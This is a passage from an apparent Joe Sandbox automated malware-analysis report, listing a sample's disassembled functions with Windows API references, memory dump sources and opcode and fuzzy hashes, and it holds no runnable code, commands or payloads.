        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: c7a780d874b1b0773b8843a612d0db43d7fdcf58ac4e5eb8db92e61f8b0f30ba
        • Instruction ID: 7c9e7c8a65a026ad1ecb0d5587b7d442275f0a40e955ff38516330144bec22ba
        • Opcode Fuzzy Hash: c7a780d874b1b0773b8843a612d0db43d7fdcf58ac4e5eb8db92e61f8b0f30ba
        • Instruction Fuzzy Hash: 07213CB0A00740DED724DF7AC48569BFBE4BF28340F40492EE5AED3652D774A644CB91
        Function 0012E298 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 0012E29D
          • Part of subcall function 00126891: __EH_prolog.LIBCMT ref: 00126896
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: e591229024c14f2758e69d514872a379e5748d22fff8c414162f3d89292e709e
        • Instruction ID: b292d28855ad1fd1b3fc600ee11ab45b7ca80b6a1b9b82398020082b102f120c
        • Opcode Fuzzy Hash: e591229024c14f2758e69d514872a379e5748d22fff8c414162f3d89292e709e
        • Instruction Fuzzy Hash: 0711C271E04360DAEB14EBB9A5457AEBBE8AFA4300F14406EE446D3382DF749E04C721
        Function 0013EB92 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 0013EB97
          • Part of subcall function 0013197C: _wcslen.LIBCMT ref: 00131992
          • Part of subcall function 00128823: __EH_prolog.LIBCMT ref: 00128828
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog$_wcslen
        • String ID:
        • API String ID: 2838827086-0
        • Opcode ID: 3cda3324b7c8d353e10ef5ac2884b04b617d8c6e55803f18959686c698cf9282
        • Instruction ID: ef524e8920c68a2efd3574b0d6807505732ae962dfde99a33225ffb673455aae
        • Opcode Fuzzy Hash: 3cda3324b7c8d353e10ef5ac2884b04b617d8c6e55803f18959686c698cf9282
        • Instruction Fuzzy Hash: C0110432909294EED740EB68BC02BD83FB4AB24314F00806EE55C532A2DFB006C4CBA2
        Function 0014D629 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0014C2E6: RtlAllocateHeap.NTDLL(00000008,00154ADC,00000000,?,0014A5BA,00000001,00000364,?,?,?,0012ECA4,?,02FB3C18,00000064,00000004,0012EA30), ref: 0014C327
        • _free.LIBCMT ref: 0014D695
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AllocateHeap_free
        • String ID:
        • API String ID: 614378929-0
        • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
        • Instruction ID: 8691dfd74f999297b1112362186f4b7cab98e09d96a43aeeaca647c4a011e9d6
        • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
        • Instruction Fuzzy Hash: 7D014972200305ABE721CF65E84195AFBD9FB99330F26062DE59883280EB30A805C778
        Function 00126891 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 7b2f2ce683394a563df39aafc269167b254f9351b80b37a739352011f15d8b38
        • Instruction ID: a3888e2e8257fff54cad432e23bbbb9438ec24ba384939c35878ba497521087c
        • Opcode Fuzzy Hash: 7b2f2ce683394a563df39aafc269167b254f9351b80b37a739352011f15d8b38
        • Instruction Fuzzy Hash: 2D01ADB1A40354BBD621EB259C02F9BBBECEBD4B44F00002EB665A7282DBB02601C665
        Function 0014C2E6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • RtlAllocateHeap.NTDLL(00000008,00154ADC,00000000,?,0014A5BA,00000001,00000364,?,?,?,0012ECA4,?,02FB3C18,00000064,00000004,0012EA30), ref: 0014C327
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 4219823c0f41f86b1f03033729c20a1a427924aa2f216527075677b552a38e5e
        • Instruction ID: b86d2221009248554b25ac1639ed23969e943af4187b01ec6a63558bc571e388
        • Opcode Fuzzy Hash: 4219823c0f41f86b1f03033729c20a1a427924aa2f216527075677b552a38e5e
        • Instruction Fuzzy Hash: F0F0E932206525A7DBB15F26AC05E5B7798BF91760B15C021F804E61B0DF70D80192E1
        Function 0014A7EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: c1c474d43e3d76db47af3a1ba502d55dfe45869280efdd3c6007394462a3176c
        • Instruction ID: b7a494e738c976ff485d1e6fe77762b21589c086c5a1713a8bc72ab1f6b2bf89
        • Opcode Fuzzy Hash: c1c474d43e3d76db47af3a1ba502d55dfe45869280efdd3c6007394462a3176c
        • Instruction Fuzzy Hash: 73E0ED76280223A7EA212765AC00B6B3A88DF613B3F870121AC04964B2DB20DC4382E3
        Function 0012B966 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0012BA94: FindFirstFileW.KERNEL32(?,?,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BABD
          • Part of subcall function 0012BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BAEB
          • Part of subcall function 0012BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BAF7
        • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0012B991
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Find$FileFirst$CloseErrorLast
        • String ID:
        • API String ID: 1464966427-0
        • Opcode ID: 3046bdd88051d123177c7564d7c9e2f0394f5ec8202beb86f552505795d6eefd
        • Instruction ID: d0e296fc83d064a42aff92ca48494f66d4f0f23d13ee7fa689718df75a37357d
        • Opcode Fuzzy Hash: 3046bdd88051d123177c7564d7c9e2f0394f5ec8202beb86f552505795d6eefd
        • Instruction Fuzzy Hash: F1F0893500D7A0AACF2217B468447C77B905F2A339F148A49F2FD121D2C37450E59722
        Function 00132121 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
        Download Yara Rule
        APIs
        • SetThreadExecutionState.KERNEL32(00000001), ref: 00132156
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ExecutionStateThread
        • String ID:
        • API String ID: 2211380416-0
        • Opcode ID: 032a60ac08fa34707c8e0a6ba30fc8b950f4d2dc0d2e4872d50a9375dc96af18
        • Instruction ID: 1ab49a79e1e02d3e8779e185c98ad1f58c628fea316345622be4faa1521a0ebf
        • Opcode Fuzzy Hash: 032a60ac08fa34707c8e0a6ba30fc8b950f4d2dc0d2e4872d50a9375dc96af18
        • Instruction Fuzzy Hash: 5DD05B2170816053EA25373C7D4ABFE1A565FD6324F1800B7F209675D38B78098792B1
        Function 0013B626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
        Download Yara Rule
        APIs
        • GdipAlloc.GDIPLUS(00000010), ref: 0013B62C
          • Part of subcall function 0013B3B8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0013B3D9
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Gdip$AllocBitmapCreateFromStream
        • String ID:
        • API String ID: 1915507550-0
        • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
        • Instruction ID: c089fe2d99b2285a7b59fc6c5a5a3fbe4e199d9b913dd70c4fb589e31b6b0a87
        • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
        • Instruction Fuzzy Hash: 15D0227060C308BADF026B71CC43A7E7A9AEB20340F008036BE01E5282FFF1CD10A2A1
        Function 00126920 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 00126925
          • Part of subcall function 001304E5: __EH_prolog.LIBCMT ref: 001304EA
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: d5c32ed3a72ab1f5fc6202e3efd14f37cf13c6c43da3afb06e789a7f3acee88a
        • Instruction ID: 50c221ca05da0a047ee43c15f3aeabde32348f9aba25f8810ca5239fd63f155c
        • Opcode Fuzzy Hash: d5c32ed3a72ab1f5fc6202e3efd14f37cf13c6c43da3afb06e789a7f3acee88a
        • Instruction Fuzzy Hash: 0DD05EB1E10434ABCB09AB48A4213AEB2A4EB24705F00016EF425B3341CBB44E048780
        Function 0013F737 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • DloadProtectSection.DELAYIMP ref: 0013F75F
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DloadProtectSection
        • String ID:
        • API String ID: 2203082970-0
        • Opcode ID: a088cfbf7b9c8721ec5148ae2acd23e6c8875c13469f6784bb88749f87818684
        • Instruction ID: 3ed0d29d0346d334c3e5902a78dc8366005fcee632b7629e4191d2ea1b09e21e
        • Opcode Fuzzy Hash: a088cfbf7b9c8721ec5148ae2acd23e6c8875c13469f6784bb88749f87818684
        • Instruction Fuzzy Hash: 6FD01234D0430899D605BBA49D4671433A0F31CB7CFC8062DF155865A1D7606682CB11
        Function 0013EEAD Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
        Download Yara Rule
        APIs
        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00132E78), ref: 0013EED2
          • Part of subcall function 0013C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013C759
          • Part of subcall function 0013C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0013C76A
          • Part of subcall function 0013C748: IsDialogMessageW.USER32(00010424,?), ref: 0013C77E
          • Part of subcall function 0013C748: TranslateMessage.USER32(?), ref: 0013C78C
          • Part of subcall function 0013C748: DispatchMessageW.USER32(?), ref: 0013C796
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$CallbackDialogDispatchDispatcherItemPeekSendTranslateUser
        • String ID:
        • API String ID: 3453300979-0
        • Opcode ID: 2823ba8138be5c41fa2379802471e3f081aa4c80464363508822e370dc8756d8
        • Instruction ID: ef9e62387235c033e28ad9dffbc5353e80943f9a8eb826557d28b784746dc669
        • Opcode Fuzzy Hash: 2823ba8138be5c41fa2379802471e3f081aa4c80464363508822e370dc8756d8
        • Instruction Fuzzy Hash: 8FD09232145300BAEA022B51DE06F1ABAE2BFA8B08F404554B689740B1C7A29E61AF02
        Function 0012AB1C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
        Download Yara Rule
        APIs
        • GetFileType.KERNEL32(000000FF,0012AA1E), ref: 0012AB28
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FileType
        • String ID:
        • API String ID: 3081899298-0
        • Opcode ID: a6d2c2cef76ea4fda56a194045293e17cd20f56c33d1e71d877af922ee2a8304
        • Instruction ID: 63e80b570106f1db136d160ab229aa7161374597e0736aa355466488c18c5a16
        • Opcode Fuzzy Hash: a6d2c2cef76ea4fda56a194045293e17cd20f56c33d1e71d877af922ee2a8304
        • Instruction Fuzzy Hash: C3C01234400219CB8E300A24B8580AAB623AF523BA7F4A395D068C90A1C3228CA3EA02
        Function 0013F31B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 625bf4f3fe82315e1bc67328abccb5a0630f11617ffcd3b78c27232229bd3736
        • Instruction ID: 9c82056bbb2bde37f2cb30e5e22aa68ccbd27d1cca23c2b2c1b21dd3557acf5c
        • Opcode Fuzzy Hash: 625bf4f3fe82315e1bc67328abccb5a0630f11617ffcd3b78c27232229bd3736
        • Instruction Fuzzy Hash: 48B01285669001BDF31831107D0AE36021CD5D0F117B0403FF401D4080E7400D06A631
        Function 0013F336 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: d9c6f46dd545f7657b70d6489455d91691b473bb4cf159c9bd97e2adc7a7c802
        • Instruction ID: 003bee15cab58330aa7da5b225cc03281005306e00a8443fa8edd46912b17760
        • Opcode Fuzzy Hash: d9c6f46dd545f7657b70d6489455d91691b473bb4cf159c9bd97e2adc7a7c802
        • Instruction Fuzzy Hash: 1CB01289669001BCF3487158BE06F36022CC5D0B117B0423FF401C8084D7800E07A731
        Function 0013F354 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
